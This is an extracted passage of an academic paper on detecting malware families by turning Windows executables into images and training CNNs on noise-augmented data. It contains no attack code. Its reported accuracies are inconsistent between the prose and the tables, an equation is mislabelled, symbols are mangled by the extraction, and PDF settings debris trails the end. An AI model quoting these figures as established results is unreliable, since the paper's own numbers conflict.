http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ In the proposed approach, there is a set of augmentation functions that acts a data creation source for CNN model. The single augmentation function, f maug, is defined as follows: XðmÞaug ¼ f maugðXÞ (4) The each augmented dataset, XðmÞaug , using each augmentation algorithm, f ðmÞ aug , is combined into a single enhanced dataset. The final augmented dataset is defined as follows: Xaug ¼ [t i¼1 XðiÞaug (5) where t is the number of augmented dataset, XðiÞaug is the ith augmented dataset. Figure 7 The different additive Laplace noise to Trojan/Win32.VBKrypt.C122300 malware. Full-size DOI: 10.7717/peerj-cs.346/fig-7 Table 1 Commonly used variables and notations. Variables/notations Description X Original input dataset Xaug Augmednted version of input dataset X f maug Augmentation function m ε Augmentation threshold Acc Accuracy of the classifier k Number of classes t Number of augmentation functions Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 13/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-7 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Implementation of the model The pseudocode of transformation of PE executable to multichannel images is shown in Algorithm 1. The each member (e(i)) of collected Windows executable file set, E, is converted multi-channel images in lines 5-6. For the first channel of the executable, one byte is read and then converted to the decimal representation in line 5. The decimal value is assigned to the first channel of the corresponding pixel, Rði; j; 0Þ. In the same way, this byte’s entropy value is assigned to the second channel of the corresponding pixel, Rði; j; 1Þ. We used imgaug library which uses 3-channel PNG images as input. On the other hand, we created 2-channel PNG images in this research. Since the imgaug software library requires three channels images, we had to fill the last channel, the Blue channel, with zeros. Accordingly, our algorithm’s both time and space complexity is O(n). The pseudocode of data-augmentation enhanced CNN malware detection are shown in Algorithm 2. The augmentation procedure is implemented based on random noise assigment of each channel of the training dataset, X, with a set of augmentation functions, Faug. EXPERIMENTS In this section, we use our public malware dataset (https://github.com/ocatak/malware_ api_class). that can be accessed publicly. The malware classification model is compared with the original dataset. In “Dataset Detail”, we explain the dataset and parameters that Algorithm 1 PE malware to image conversion. 1: Inputs: PE executable set E, image width w, image height h, channel size c 2: for each e(i) ∈ E do 3: R zeros(w,h, c) where R ∈ Rw×h×c ⊳ Create a zero filled matrix 4: for each byte value b(j) ∈ e(i) do 5: Rði; j; 0Þ decimal(b(j)) ⊳ 1st channel with value ∈ [0,255] 6: Rði; j; 1Þ −Sx∈b(j) (p(x) · log p(x)) ⊳ 2nd channel with entropy ∈ [0,255] 7: end for 8: end for 9: Outputs: Image dataset X Algorithm 2 Data enhancement. 1: Inputs: X = {{(xi, yi) | i = 1, : : : , n}, xi ∈ Rp, yi ∈ {−1,+1}}mi = 1, Augmentation function set Faug 2: Initialize X(i)aug = X 3: for each f (i)aug ∈ Faug do 4: X(i)aug ) f (i) aug(X) 5: X ) X ∪ X(i)aug 6: end for 7: Outputs: Enhanced dataset X Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 14/26 https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ are used in our experiments. The conventional CNN is applied the dataset and we find the classification performance in “Dataset Results with Conventional CNN”. In “Dataset Results with Proposed Method”, we show the emprical results of proposed augmented CNN training algorithm. Experimental setup To our knowledge, there is no public benchmark dataset for malware images approach to make an evaluation comparison. We apply our dataset with different hyper-parameters to indicate the effectiveness and classification performance of the proposed model. The experiments are done using the Python programming language and machine learning libraries Keras, Tensorflow, and Scikit-learn. We used the Keras library to build CNN networks. For the experimental setup to generate a model that is able to generalize, we divided the dataset into two partitions: the training set with 80% of the dataset and the testing set with 20% of the dataset. The learning rate for the CNN was 0.01. Dataset detail We trained our classifiers with our public dataset which is summarized in Table 2 with seven different classes including Worm, Downloader, Spyware, Adware, Exploit, Malware and Benign. There are 5,762 malware samples from different classes in this dataset. The Cuckoo Sandbox application, as explained above, is used to obtain the Windows API call sequences of malicious software, and VirusTotal Service is used to detect the classes of malware. Figure 8 illustrates the system architecture used to collect the data and labeling process. Our system consists of two main parts, data collection, and labeling. Evaluation Although the dataset that is applied in our method is almost balanced, performance evaluation in terms of traditional accuracy not sufficient to obtain an optimal classifier. Besides, we apply four metrics such as the overall prediction accuracy, average recall, Table 2 Description of the training dataset used in the experiments. Malware type #Inst. Worm 1,620 Downloader 1,512 Spyware 582 Adware 1,146 Exploit 138 Malware 456 Benign 308 Total 5,762 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 15/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ average precision Turpin & Scholer (2006) and F1-score, to estimate the classification accuracy that are used as measurement metrics in machine learning common Manning, Raghavan & Schütze (2008) and Makhoul et al. (1999). Precision is the ratio of predicted positive classes to positive predictions. Precision is estimated in Eq. (6). Precision ¼ Correct Correct þ False (6) Recall is the ratio of positive classes to the sum of positive correct estimation and false negative. It can be called Sensitivity. Recall is indicated in Eq. (7). Precision ¼ Correct Correct þ Missed (7) First, our proposed evaluation model estimates precision and recall for each and then calculate their mean. In Eqs. (8) and (9), we present average precision and recall. Precisionavg ¼ 1 nclasses Xnclasses�1 i¼0 Preci � num of instancesið Þ (8) Figure 8 General system architecture. Architecture consists of three parts; data collection, data pre- processing and data classification. Full-size DOI: 10.7717/peerj-cs.346/fig-8 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 16/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-8 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Figure 9 Accuracy changes over learning iterations. As can be seen, although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together. Full-size DOI: 10.7717/peerj-cs.346/fig-9 Figure 10 Loss changes over learning iterations. As can be seen, although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together as in Fig. 9. Full-size DOI: 10.7717/peerj-cs.346/fig-10 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 17/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-9 http://dx.doi.org/10.7717/peerj-cs.346/fig-10 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Recallavg ¼ 1 nclasses Xnclasses�1 i¼0 Recalli � num of instancesið Þ (9) The average precision and recall values are calculated using the multiplication of recall and the number of instance in the corresponding class. Precision and Recall are evaluated together in F-measure. It is the harmonic mean of precision and recall. F-measure is provided in Eq. (10). F1 ¼ 2� Precavg � Recallavg Precavg þ Recallavg (10) Dataset results with conventional CNN Figure 9 presents the accuracy performance of the conventional CNN model for our experimental data set. As shown in figure, the model becomes its steady state after Figure 11 The confusion matrix of the CNN model, which was trained using the original dataset. Full-size DOI: 10.7717/peerj-cs.346/fig-11 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 18/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-11 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ 80th epoch. Also, Fig. 10 shows the loss value changes of classification model through epochs. A confusion matrix is applied to evaluate the performance of our model. The findings from Fig. 11 show the confusion matrix that was trained by using the original dataset by using CNN model. The findings of the confusion matrix indicate that the classification model performance is not good enough for the malware detection. The testing classification performance is measured through accuracy, precision, recall and F1 measure. Table 3 shows the best performance of the conventional CNN method of each malware family. As can be seen from the confusion matrix and classification report, the classification performance of the model obtained with conventional CNN is rather low. According to these results, a standard CNN model with RGB type 3-channel image training dataset is not suitable for malware detection and classification. Dataset results with proposed method Figure 12 shows the accuracy change in each iteration of the CNN model, which is trained with the malware dataset containing a different amount of noise. The performance results of four CNN models, whose dataset is enriched by using both Additive Laplace, Additive Gaussian, and Additive Poisson methods, are better than the CNN model’s classification performance that is trained only with the original training data set. When the noise ratio is 0.5, the original CNN model’s classification result is better than the CNN model with the Additive Poisson method. When the noise ratio is increased to 0.8, the classification results of CNN models with Additive Gaussian, Additive Laplace, and Additive Poisson begin to decrease. Figure 13 shows the accuracy change in each iteration of the CNN model, which is trained with the malware dataset containing a different amount of noise with different combination of noise models. The performance results of five CNN models, whose dataset is enriched by using combination of Additive Laplace, Additive Gaussian and Additive Poisson methods, are better than the CNN model’s classification performance that is trained only with the original training data set. When the noise ratio is 0.4, the original Table 3 Classification report of conventional CNN for each malware class. Precision Recall F1 Worm 0.60 0.58 0.59 Downloader 0.82 0.11 0.20 Dropper 0.62 0.05 0.10 Spyware 0.39 0.69 0.50 Adware 0.22 0.72 0.34 Exploit 0.86 0.26 0.40 Malware 0.00 0.00 0.00 Benign 0.77 0.83 0.80 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 19/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ CNN model’s classification result is better than the CNN model with the several combination of noise injection methods. Table 4 shows the accuracy changes with different noise methods and different noise ratio. The fields shown as bold on the table show the best accuracy value of the column. The best accuracy value for Poisson noise is obtained with 0.902 and 0.3 noise ratio, the best accuracy value for Gaussian noise is obtained with 0.922 and 0.4 noise ratio, and the best accuracy value for Laplace noise is obtained with 0.819 and 0.2 noise ratio. According to the table, we obtain the best classification performance with the Gaussian noise’s 0.4 noise ratio. Figure 12 The different noise ratio accuracy results for additive Laplace/Gaussian/Poisson and original CNN model’s accuracy results. Noise scale: (A) 0.01; (B) 0.2; (C) 0.4; (D) 0.6; (E) 0.8 and (F) 1.0. Full-size DOI: 10.7717/peerj-cs.346/fig-12 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 20/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-12 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Table 5 shows the accuracy changes with the different combination of noise methods and different noise ratio. The fields shown as bold on the table show the best accuracy value of the column. The best accuracy value for Poisson/gaussian noise is obtained with 0.93 and 0.2 noise ratio, the best accuracy value for Poisson/laplace noise is obtained Figure 13 The different noise ratio accuracy results for the combination of additive Laplace/ Gaussian/Poisson and original CNN model’s accuracy results. Noise scale: (A) 0.01; (B) 0.2; (C) 0.4; (D) 0.6; (E) 0.8 and (F) 1.0. Full-size DOI: 10.7717/peerj-cs.346/fig-13 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 21/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-13 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ with 0.95 and 0.01 noise ratio, the best accuracy value for Laplace/gaussian noise is obtained with 1.00 and 0.01 noise ratio. The best classification performance is performed by using the Poisson noise with 0.01 value has a 100% classification performance. Figure 14 shows the confusion matrix of the malware detection model with the best classification performance. Table 4 Noise injection accuracy results. The bold entries show the best values. Noise ratio Orginal model Poission Gaussian Laplace 0.01 0.83 1.00 0.96 0.99 0.2 0.83 0.95 0.99 0.87 0.4 0.83 0.95 0.95 0.98 0.6 0.83 0.60 0.98 0.92 0.8 0.83 0.49 0.94 0.35 0.0 0.83 0.33 0.80 0.48 Figure 14 The confusion matrix of the CNN model with best data noise injection ratio. Full-size DOI: 10.7717/peerj-cs.346/fig-14 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 22/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-14 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ CONCLUSION AND FUTURE WORK The primary purpose of this research study is to detect malware families in a metamorphic malware environment using an image augmentation enhanced deep CNN model. The architecture of the model consists of three main components: image generation from malware samples, image augmentation, and classifying the malware families by using CNN models. In the first component, the collected malware samples are converted into binary representation using the windowing technique. The imgaug Python library is used to apply image augmentation techniques in the second component. The dataset is enhanced using additive noise techniques such as Gaussian, Laplacian, and Poisson. We apply it to our dataset with different hyper-parameters to demonstrate the proposed model’s effectiveness and classification performance. Finally, we train our classifier on our public dataset with seven different classes, including Worm, Downloader, Spyware, Adware, Exploit, Malware and 346 Benign. The model reaches its steady-state after the 80th epoch. We observe that the training dataset shows more stable progress as compared to the test dataset, although both progress together. We apply four different metrics to evaluate the classification accuracy, such as the overall prediction accuracy, average recall, average precision and F1-score. The confusion matrix results indicate that the classification model performance is not good enough for malware detection. The classification performance of the model obtained with conventional CNN is relatively low. According to these results, a standard CNN model with an RGB type 3-channel image training dataset is not suitable for malware detection and classification. The augmentation is measured with varying noise ratio to assess the effectiveness of the learning algorithm. This article’s main contribution is to propose a data augmentation enhanced malware family classification model that exploits augmentation for variants of malware clones and takes advantage of CNN to improve image classification. It is evident from the results of this research that the data augmentation based on 3-channel image classification can significantly influence the performance of malware family classification. In future work, we intend to classify the correctly labeled dataset using the malware images method. We also plan to apply other sequential data classification algorithms used before deep learning. Table 5 The best accuracy rates for the combination of each noise type. The bold entries show the best accuracy values. Noise Org Poisson/Gaussian Poisson/Laplace Laplace/Gaussian All 0.01 0.83 0.90 0.95 0.98 0.96 0.2 0.83 0.93 0.90 0.95 0.95 0.4 0.83 0.90 0.71 0.90 0.42 0.6 0.83 0.47 0.52 0.38 0.76 0.8 0.83 0.52 0.47 0.76 0.66 0.0 0.83 0.76 0.52 0.47 0.76 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 23/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Ferhat Ozgur Catak conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � Javed Ahmed conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Kevser Sahinbas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Zahid Hussain Khand conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at GitHub: https://github.com/ocatak/malware_api_class REFERENCES Catak FO, Yazı AF. 2019. A benchmark api call dataset for Windows pe malware classification. ArXiv preprint arXiv:1905.01999. Catak FO, Yazı AF, Elezaj O, Ahmed J. 2020. Deep learning based sequential model for malware analysis using windows exe api calls. PeerJ Computer Science 6:e285. Chen B, Ren Z, Yu C, Hussain I, Liu J. 2019. Adversarial examples for cnn-based malware detectors. IEEE Access 7:54360–54371. Cui Z, Xue F, Cai X, Cao Y, Wang G, Chen J. 2018. Detection of malicious code variants based on deep learning. IEEE Transactions on Industrial Informatics 14(7):3187–3196. Dai Y, Li H, Qian Y, Lu X. 2018. A malware classification method based on memory dump grayscale image. Digital Investigation 27:30–37. Fu J, Xue J, Wang Y, Liu Z, Shan C. 2018. Malware visualization for fine-grained classification. IEEE Access 6:14510–14523. Gibert D, Mateu C, Planes J, Vicens R. 2019. Using convolutional neural networks for classification of malware represented as images. Journal of Computer Virology and Hacking Techniques 15(1):15–28. Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 24/26 https://github.com/ocatak/malware_api_class http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Harmsen JJ, Pearlman WA. 2003. Steganalysis of additive-noise modelable information hiding. In: Security and Watermarking of Multimedia Contents V. Vol. 5020.. Bellingham, Washington: International Society for Optics and Photonics, 131–142. Hida T, Si S. 2008. Lectures on white noise functionals. Singapore: World Scientific. Holmstrom L, Koistinen P. 1992. Using additive noise in back-propagation training. IEEE Transactions on Neural Networks 3(1):24–38. Kancherla K, Mukkamala S. 2013. Image visualization based malware detection. In: 2013 IEEE Symposium on Computational Intelligence in Cyber Security (CICS). Piscataway: IEEE, 40–44. Kosmidis K, Kalloniatis C. 2017. Machine learning and images for malware detection and classification. In: Proceedings of the 21st Pan-Hellenic Conference on Informatics, PCI 2017. New York: Association for Computing Machinery. Liu Y, Lai Y, Wang Z, Yan H. 2019. A new learning approach to malware classification using discriminative feature extraction. IEEE Access 7:13015–13023. Makandar A, Patrot A. 2017. Malware class recognition using image processing techniques. In: 2017 International Conference on Data Management, Analytics and Innovation (ICDMAI). 76–80. Makhoul J, Kubala F, Schwartz R, Weischedel R. 1999. Performance measures for information extraction. In: Proceedings of DARPA Broadcast News Workshop, 249–252. Manning CD, Raghavan P, Schütze H. 2008. Introduction to information retrieval. New York: Cambridge University Press. Marks RJ, Wise GL, Haldeman DG, Whited JL. 1978. Detection in Laplace noise. IEEE Transactions on Aerospace Electronic Systems 14(6):866–872 DOI 10.1109/TAES.1978.308550. Mira F. 2019. A review paper of malware detection using api call sequences. In: 2019 2nd International Conference on Computer Applications Information Security (ICCAIS). 1–6. Nataraj L, Karthikeyan S, Jacob G, Manjunath BS. 2011. Malware images: visualization and automatic classification. In: Proceedings of the 8th International Symposium on Visualization for Cyber Security, VizSec’11. New York: Association for Computing Machinery. Ni S, Qian Q, Zhang R. 2018. Malware identification using visualization images and deep learning. Computers & Security 77:871–885 DOI 10.1016/j.cose.2018.04.005. Nisa M, Shah JH, Kanwal S, Raza M, Khan MA, Damaševicius R, Blažauskas T. 2020. Hybrid malware classification method using segmentation-based fractal texture analysis and deep convolution neural network features. Applied Sciences 10(14):4966. Selesnick IW. 2008. The estimation of laplace random vectors in additive white gaussian noise. IEEE Transactions on Signal Processing 56(8):3482–3496 DOI 10.1109/TSP.2008.920488. Shamshirband S, Chronopoulos AT. 2019. A new malware detection system using a high performance-elm method. In: Proceedings of the 23rd International Database Applications and Engineering Symposium, IDEAS ’19. New York: Association for Computing Machinery. Shamshirband S, Fathi M, Chronopoulos AT, Montieri A, Palumbo F, Pescape A. 2020. Computational intelligence intrusion detection techniques in mobile cloud computing environments: review, taxonomy, and open research issues. Journal of Information Security and Applications 55:102582 DOI 10.1016/j.jisa.2020.102582. Tobiyama S, Yamaguchi Y, Shimada H, Ikuse T, Yagi T. 2016. Malware detection with deep neural network using process behavior. In: 2016 IEEE 40th Annual Computer Software and Applications Conference (COMPSAC). Piscataway: IEEE, 577–582. Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 25/26 http://dx.doi.org/10.1109/TAES.1978.308550 http://dx.doi.org/10.1016/j.cose.2018.04.005 http://dx.doi.org/10.1109/TSP.2008.920488 http://dx.doi.org/10.1016/j.jisa.2020.102582 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Turpin A, Scholer F. 2006. User performance versus precision measures for simple search tasks. In: Proceedings of the 29th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, SIGIR ’06. New York: ACM, 11–18. Venkatraman S, Alazab M, Vinayakumar R. 2019. A hybrid deep learning image-based analysis for effective malware detection. Journal of Information Security and Applications 47:377–389 DOI 10.1016/j.jisa.2019.06.006. Wojtkiewicz SF, Johnson EA, Bergman LA, Grigoriu M, Spencer BF. 1999. Response of stochastic dynamical systems driven by additive gaussian and poisson white noise: solution of a forward generalized kolmogorov equation by a spectral finite difference method. Computer Methods in Applied Mechanics and Engineering 168(1):73–89 DOI 10.1016/S0045-7825(98)00098-X. Yakura H, Shinozaki S, Nishimura R, Oyama Y, Sakuma J. 2018. Malware analysis of imaged binary samples by convolutional neural network with attention mechanismIn: Proceedings of the Eighth ACM Conference on Data and Application Security and Privacy, CODASPY’18. New York: ACM, 127–134. Yan J, Qi Y, Rao Q. 2018. Detecting malware with an ensemble method based on deep neural network. Security and Communication Networks 2018(1):1–16 DOI 10.1155/2018/7247095. Yazı AF, Catak FO, Gul E. 2019. Classification of methamorphic malware with deep learning (lstm). In: 2019 27th Signal Processing and Communications Applications Conference (SIU). 1–4. Yoo S, Kim S, Kang BB. 2020. The image game: exploit kit detection based on recursive convolutional neural networks. IEEE Access 8:18808–18821 DOI 10.1109/ACCESS.2020.2967746. Yue S. 2017. Imbalanced malware images classification: a cnn based approach. ArXiv preprint arXiv:1708.08042. Zhang J, Qin Z, Yin H, Ou L, Hu Y. 2016. Irmd: malware variant detection using opcode image recognition. In: 2016 IEEE 22nd International Conference on Parallel and Distributed Systems (ICPADS). Piscataway: IEEE, 1175–1180. Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 26/26 http://dx.doi.org/10.1016/j.jisa.2019.06.006 http://dx.doi.org/10.1016/S0045-7825(98)00098-X http://dx.doi.org/10.1155/2018/7247095 http://dx.doi.org/10.1109/ACCESS.2020.2967746 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Data augmentation based malware detection using convolutional neural networks Introduction Related work System model Proposed approach Experiments Conclusion and future work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD 